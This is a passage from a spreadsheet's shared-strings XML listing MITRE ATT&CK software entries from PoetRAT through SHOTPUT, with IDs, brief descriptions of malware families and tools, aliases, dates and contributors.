  <si>
    <t>https://attack.mitre.org/software/S0013</t>
  </si>
  <si>
    <t>20 June 2020</t>
  </si>
  <si>
    <t>DestroyRAT, Kaba, Korplug, Sogu</t>
  </si>
  <si>
    <t>S0428</t>
  </si>
  <si>
    <t>PoetRAT</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) is a remote access trojan (RAT) that was first identified in April 2020. [PoetRAT](https://attack.mitre.org/software/S0428) has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. [PoetRAT](https://attack.mitre.org/software/S0428) derived its name from references in the code to poet William Shakespeare. (Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)(Citation: Dragos Threat Report 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0428</t>
  </si>
  <si>
    <t>27 April 2020</t>
  </si>
  <si>
    <t>S0012</t>
  </si>
  <si>
    <t>PoisonIvy</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups. (Citation: FireEye Poison Ivy) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0012</t>
  </si>
  <si>
    <t>Darkmoon, Poison Ivy</t>
  </si>
  <si>
    <t>Darren Spruell</t>
  </si>
  <si>
    <t>S0518</t>
  </si>
  <si>
    <t>PolyglotDuke</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) is a downloader that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2013. [PolyglotDuke](https://attack.mitre.org/software/S0518) has been used to drop [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0518</t>
  </si>
  <si>
    <t>S0453</t>
  </si>
  <si>
    <t>Pony</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0453</t>
  </si>
  <si>
    <t>21 May 2020</t>
  </si>
  <si>
    <t>25 June 2020</t>
  </si>
  <si>
    <t>Arie Olshtein, Check Point; Kobi Eisenkraft, Check Point</t>
  </si>
  <si>
    <t>S0378</t>
  </si>
  <si>
    <t>PoshC2</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://attack.mitre.org/techniques/T1059/001). Although [PoshC2](https://attack.mitre.org/software/S0378) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0378</t>
  </si>
  <si>
    <t>S0177</t>
  </si>
  <si>
    <t>Power Loader</t>
  </si>
  <si>
    <t>[Power Loader](https://attack.mitre.org/software/S0177) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0177</t>
  </si>
  <si>
    <t>Win32/Agent.UAW</t>
  </si>
  <si>
    <t>S0139</t>
  </si>
  <si>
    <t>PowerDuke</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. (Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0139</t>
  </si>
  <si>
    <t>S0441</t>
  </si>
  <si>
    <t>PowerShower</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) is a PowerShell backdoor used by [Inception](https://attack.mitre.org/groups/G0100) for initial reconnaissance and to download and execute second stage payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0441</t>
  </si>
  <si>
    <t>08 May 2020</t>
  </si>
  <si>
    <t>20 May 2020</t>
  </si>
  <si>
    <t>S0194</t>
  </si>
  <si>
    <t>PowerSploit</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework comprised of [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0194</t>
  </si>
  <si>
    <t>S0393</t>
  </si>
  <si>
    <t>PowerStallion</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) is a lightweight [PowerShell](https://attack.mitre.org/techniques/T1059/001) backdoor used by [Turla](https://attack.mitre.org/groups/G0010), possibly as a recovery access tool to install other backdoors.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0393</t>
  </si>
  <si>
    <t>21 June 2019</t>
  </si>
  <si>
    <t>S0113</t>
  </si>
  <si>
    <t>Prikormka</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. (Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0113</t>
  </si>
  <si>
    <t>S0279</t>
  </si>
  <si>
    <t>Proton</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) is a macOS backdoor focusing on data theft and credential access  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0279</t>
  </si>
  <si>
    <t>22 January 2021</t>
  </si>
  <si>
    <t>S0238</t>
  </si>
  <si>
    <t>Proxysvc</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) is a malicious DLL used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of [Proxysvc](https://attack.mitre.org/software/S0238) is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. (Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0238</t>
  </si>
  <si>
    <t>S0029</t>
  </si>
  <si>
    <t>PsExec</t>
  </si>
  <si>
    <t>[PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers. (Citation: Russinovich Sysinternals) (Citation: SANS PsExec)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0029</t>
  </si>
  <si>
    <t>S0078</t>
  </si>
  <si>
    <t>Psylo</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) is a shellcode-based Trojan that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). It has similar characteristics as [FakeM](https://attack.mitre.org/software/S0076). (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0078</t>
  </si>
  <si>
    <t>S0147</t>
  </si>
  <si>
    <t>Pteranodon</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) is a custom backdoor used by [Gamaredon Group](https://attack.mitre.org/groups/G0047). (Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0147</t>
  </si>
  <si>
    <t>S0192</t>
  </si>
  <si>
    <t>Pupy</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. (Citation: GitHub Pupy) It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). (Citation: GitHub Pupy) [Pupy](https://attack.mitre.org/software/S0192) is publicly available on GitHub. (Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0192</t>
  </si>
  <si>
    <t>13 May 2020</t>
  </si>
  <si>
    <t>Android, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>S0583</t>
  </si>
  <si>
    <t>Pysa</t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0583</t>
  </si>
  <si>
    <t>Mespinoza</t>
  </si>
  <si>
    <t>S0269</t>
  </si>
  <si>
    <t>QUADAGENT</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0269</t>
  </si>
  <si>
    <t>S0262</t>
  </si>
  <si>
    <t>QuasarRAT</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that is publicly available on GitHub. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language. (Citation: GitHub QuasarRAT) (Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0262</t>
  </si>
  <si>
    <t>xRAT</t>
  </si>
  <si>
    <t>S0055</t>
  </si>
  <si>
    <t>RARSTONE</t>
  </si>
  <si>
    <t>[RARSTONE](https://attack.mitre.org/software/S0055) is malware used by the [Naikon](https://attack.mitre.org/groups/G0019) group that has some characteristics similar to [PlugX](https://attack.mitre.org/software/S0013). (Citation: Aquino RARSTONE)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0055</t>
  </si>
  <si>
    <t>S0241</t>
  </si>
  <si>
    <t>RATANKBA</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) is a remote controller tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [RATANKBA](https://attack.mitre.org/software/S0241) has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. [RATANKBA](https://attack.mitre.org/software/S0241) has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. (Citation: Lazarus RATANKBA) (Citation: RATANKBA)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0241</t>
  </si>
  <si>
    <t>S0495</t>
  </si>
  <si>
    <t>RDAT</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) is a backdoor used by the suspected Iranian threat group [OilRig](https://attack.mitre.org/groups/G0049). [RDAT](https://attack.mitre.org/software/S0495) was originally identified in 2017 and targeted companies in the telecommunications sector.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0495</t>
  </si>
  <si>
    <t>28 July 2020</t>
  </si>
  <si>
    <t>15 October 2020</t>
  </si>
  <si>
    <t xml:space="preserve">RDAT </t>
  </si>
  <si>
    <t>S0416</t>
  </si>
  <si>
    <t>RDFSNIFFER</t>
  </si>
  <si>
    <t>[RDFSNIFFER](https://attack.mitre.org/software/S0416) is a module loaded by [BOOSTWRITE](https://attack.mitre.org/software/S0415) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0416</t>
  </si>
  <si>
    <t>16 October 2019</t>
  </si>
  <si>
    <t>S0496</t>
  </si>
  <si>
    <t>REvil</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496) is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0496</t>
  </si>
  <si>
    <t>04 August 2020</t>
  </si>
  <si>
    <t>Sodin, Sodinokibi</t>
  </si>
  <si>
    <t>S0258</t>
  </si>
  <si>
    <t>RGDoor</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. [RGDoor](https://attack.mitre.org/software/S0258) has been seen deployed on webservers belonging to the Middle East government organizations. [RGDoor](https://attack.mitre.org/software/S0258) provides backdoor access to compromised IIS servers. (Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0258</t>
  </si>
  <si>
    <t>S0003</t>
  </si>
  <si>
    <t>RIPTIDE</t>
  </si>
  <si>
    <t>[RIPTIDE](https://attack.mitre.org/software/S0003) is a proxy-aware backdoor used by [APT12](https://attack.mitre.org/groups/G0005). (Citation: Moran 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0003</t>
  </si>
  <si>
    <t>S0112</t>
  </si>
  <si>
    <t>ROCKBOOT</t>
  </si>
  <si>
    <t>[ROCKBOOT](https://attack.mitre.org/software/S0112) is a [Bootkit](https://attack.mitre.org/techniques/T1542/003) that has been used by an unidentified, suspected China-based group. (Citation: FireEye Bootkits)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0112</t>
  </si>
  <si>
    <t>S0240</t>
  </si>
  <si>
    <t>ROKRAT</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067). This software has been used to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) used ROKRAT during several campaigns in 2016 through 2018. (Citation: Talos ROKRAT) (Citation: Talos Group123)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0240</t>
  </si>
  <si>
    <t>S0148</t>
  </si>
  <si>
    <t>RTM</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://attack.mitre.org/groups/G0048)). Newer versions of the malware have been reported publicly as Redaman.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0148</t>
  </si>
  <si>
    <t>Redaman</t>
  </si>
  <si>
    <t>S0481</t>
  </si>
  <si>
    <t>Ragnar Locker</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) is a ransomware that has been in use since at least December 2019.(Citation: Sophos Ragnar May 2020)(Citation: Cynet Ragnar Apr 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0481</t>
  </si>
  <si>
    <t>S0565</t>
  </si>
  <si>
    <t>Raindrop</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was discovered in January 2021 and was likely used since at least May 2020.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0565</t>
  </si>
  <si>
    <t>19 January 2021</t>
  </si>
  <si>
    <t>S0458</t>
  </si>
  <si>
    <t>Ramsay</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between [Ramsay](https://attack.mitre.org/software/S0458) and the [Darkhotel](https://attack.mitre.org/groups/G0012)-associated Retro malware.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0458</t>
  </si>
  <si>
    <t>Harry Kim, CODEMIZE</t>
  </si>
  <si>
    <t>S0364</t>
  </si>
  <si>
    <t>RawDisk</t>
  </si>
  <si>
    <t>[RawDisk](https://attack.mitre.org/software/S0364) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.(Citation: EldoS RawDisk ITpro)(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0364</t>
  </si>
  <si>
    <t>S0169</t>
  </si>
  <si>
    <t>RawPOS</t>
  </si>
  <si>
    <t>[RawPOS](https://attack.mitre.org/software/S0169) is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. (Citation: Kroll RawPOS Jan 2017) (Citation: TrendMicro RawPOS April 2015) (Citation: Visa RawPOS March 2015) FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0169</t>
  </si>
  <si>
    <t>DRIFTWOOD, DUEBREW, FIENDCRY</t>
  </si>
  <si>
    <t>Walker Johnson</t>
  </si>
  <si>
    <t>S0172</t>
  </si>
  <si>
    <t>Reaver</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the "Five Poisons," which are movements the Chinese government considers dangerous. The type of malware is rare due to its final payload being in the form of [Control Panel](https://attack.mitre.org/techniques/T1218/002) items.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0172</t>
  </si>
  <si>
    <t>S0153</t>
  </si>
  <si>
    <t>RedLeaves</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) is a malware family used by [menuPass](https://attack.mitre.org/groups/G0045). The code overlaps with [PlugX](https://attack.mitre.org/software/S0013) and may be based upon the open source tool Trochilus. (Citation: PWC Cloud Hopper Technical Annex April 2017) (Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0153</t>
  </si>
  <si>
    <t>BUGJUICE</t>
  </si>
  <si>
    <t>S0075</t>
  </si>
  <si>
    <t>Reg</t>
  </si>
  <si>
    <t>[Reg](https://attack.mitre.org/software/S0075) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. (Citation: Microsoft Reg)
Utilities such as [Reg](https://attack.mitre.org/software/S0075) are known to be used by persistent threats. (Citation: Windows Commands JPCERT)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0075</t>
  </si>
  <si>
    <t>reg.exe</t>
  </si>
  <si>
    <t>S0511</t>
  </si>
  <si>
    <t>RegDuke</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) is a first stage implant written in .NET and used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2017. [RegDuke](https://attack.mitre.org/software/S0511) has been used to control a compromised machine when control of other implants on the machine was lost.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0511</t>
  </si>
  <si>
    <t>S0019</t>
  </si>
  <si>
    <t>Regin</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some [Regin](https://attack.mitre.org/software/S0019) timestamps date back to 2003. (Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0019</t>
  </si>
  <si>
    <t>S0332</t>
  </si>
  <si>
    <t>Remcos</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://attack.mitre.org/software/S0332) has been observed being used in malware campaigns.(Citation: Riskiq Remcos Jan 2018)(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0332</t>
  </si>
  <si>
    <t>S0375</t>
  </si>
  <si>
    <t>Remexi</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) is a Windows-based Trojan that was developed in the C programming language.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0375</t>
  </si>
  <si>
    <t>S0166</t>
  </si>
  <si>
    <t>RemoteCMD</t>
  </si>
  <si>
    <t>[RemoteCMD](https://attack.mitre.org/software/S0166) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to execute commands on a remote system similar to SysInternal's PSEXEC functionality. (Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0166</t>
  </si>
  <si>
    <t>S0592</t>
  </si>
  <si>
    <t>RemoteUtilities</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) is a legitimate remote administration tool that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021 for execution on target machines.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0592</t>
  </si>
  <si>
    <t>S0125</t>
  </si>
  <si>
    <t>Remsec</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is a modular backdoor that has been used by [Strider](https://attack.mitre.org/groups/G0041) and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. (Citation: Symantec Strider Blog)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0125</t>
  </si>
  <si>
    <t>Backdoor.Remsec, ProjectSauron</t>
  </si>
  <si>
    <t>S0174</t>
  </si>
  <si>
    <t>Responder</t>
  </si>
  <si>
    <t>Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. (Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0174</t>
  </si>
  <si>
    <t>S0379</t>
  </si>
  <si>
    <t>Revenge RAT</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) is a freely available remote access tool written in .NET (C#).(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0379</t>
  </si>
  <si>
    <t>02 May 2019</t>
  </si>
  <si>
    <t>S0433</t>
  </si>
  <si>
    <t>Rifdoor</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) is a remote access trojan (RAT) that shares numerous code similarities with [HotCroissant](https://attack.mitre.org/software/S0431).(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0433</t>
  </si>
  <si>
    <t>S0448</t>
  </si>
  <si>
    <t>Rising Sun</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor malware used extensively in Operation [Sharpshooter](https://attack.mitre.org/groups/G0104). The malware has been observed targeting nuclear, defense, energy, and financial services companies across the world. [Rising Sun](https://attack.mitre.org/software/S0448) uses source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0448</t>
  </si>
  <si>
    <t>S0400</t>
  </si>
  <si>
    <t>RobbinHood</t>
  </si>
  <si>
    <t>[RobbinHood](https://attack.mitre.org/software/S0400) is ransomware that was first observed being used in an attack against the Baltimore city government's computer network.(Citation: CarbonBlack RobbinHood May 2019)(Citation: BaltimoreSun RobbinHood May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0400</t>
  </si>
  <si>
    <t>29 July 2019</t>
  </si>
  <si>
    <t>S0270</t>
  </si>
  <si>
    <t>RogueRobin</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) is a payload used by [DarkHydrus](https://attack.mitre.org/groups/G0079) that has been developed in PowerShell and C#. (Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0270</t>
  </si>
  <si>
    <t>S0090</t>
  </si>
  <si>
    <t>Rover</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. (Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0090</t>
  </si>
  <si>
    <t>S0358</t>
  </si>
  <si>
    <t>Ruler</t>
  </si>
  <si>
    <t>[Ruler](https://attack.mitre.org/software/S0358) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://attack.mitre.org/software/S0358) have also released a defensive tool, NotRuler, to detect its usage.(Citation: SensePost Ruler GitHub)(Citation: SensePost NotRuler)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0358</t>
  </si>
  <si>
    <t>04 February 2019</t>
  </si>
  <si>
    <t>Office 365, Windows</t>
  </si>
  <si>
    <t>S0253</t>
  </si>
  <si>
    <t>RunningRAT</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [Brave Prince](https://attack.mitre.org/software/S0252). (Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0253</t>
  </si>
  <si>
    <t>S0446</t>
  </si>
  <si>
    <t>Ryuk</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0446</t>
  </si>
  <si>
    <t>Matt Brenton, Zurich Insurance Group; The DFIR Report, @TheDFIRReport</t>
  </si>
  <si>
    <t>S0085</t>
  </si>
  <si>
    <t>S-Type</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2013 to 2014. (Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0085</t>
  </si>
  <si>
    <t>S0461</t>
  </si>
  <si>
    <t>SDBbot</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) is a backdoor with installer and loader components that has been used by [TA505](https://attack.mitre.org/groups/G0092) since at least 2019.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0461</t>
  </si>
  <si>
    <t>01 June 2020</t>
  </si>
  <si>
    <t>29 March 2021</t>
  </si>
  <si>
    <t>S0195</t>
  </si>
  <si>
    <t>SDelete</t>
  </si>
  <si>
    <t>[SDelete](https://attack.mitre.org/software/S0195) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. (Citation: Microsoft SDelete July 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0195</t>
  </si>
  <si>
    <t>S0185</t>
  </si>
  <si>
    <t>SEASHARPEE</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell that has been used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0185</t>
  </si>
  <si>
    <t>S0450</t>
  </si>
  <si>
    <t>SHARPSTATS</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) is a .NET backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2019.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0450</t>
  </si>
  <si>
    <t>S0028</t>
  </si>
  <si>
    <t>SHIPSHAPE</t>
  </si>
  <si>
    <t>[SHIPSHAPE](https://attack.mitre.org/software/S0028)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</si>
  <si>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https://attack.mitre.org/software/S0028</t>
  </si>
  <si>
    <t>S0063</t>
  </si>
  <si>
    <t>SHOTPUT</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) is a custom backdoor used by [APT3](https://attack.mitre.org/groups/G0022). (Citation: FireEye Clandestine Wolf)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0063</t>
  </si>
  <si>
    <t>Backdoor.APT.CookieCutter, Pirpi</t>
  </si>
  <si>
    <t>S0217</t>
  </si>
  <si>
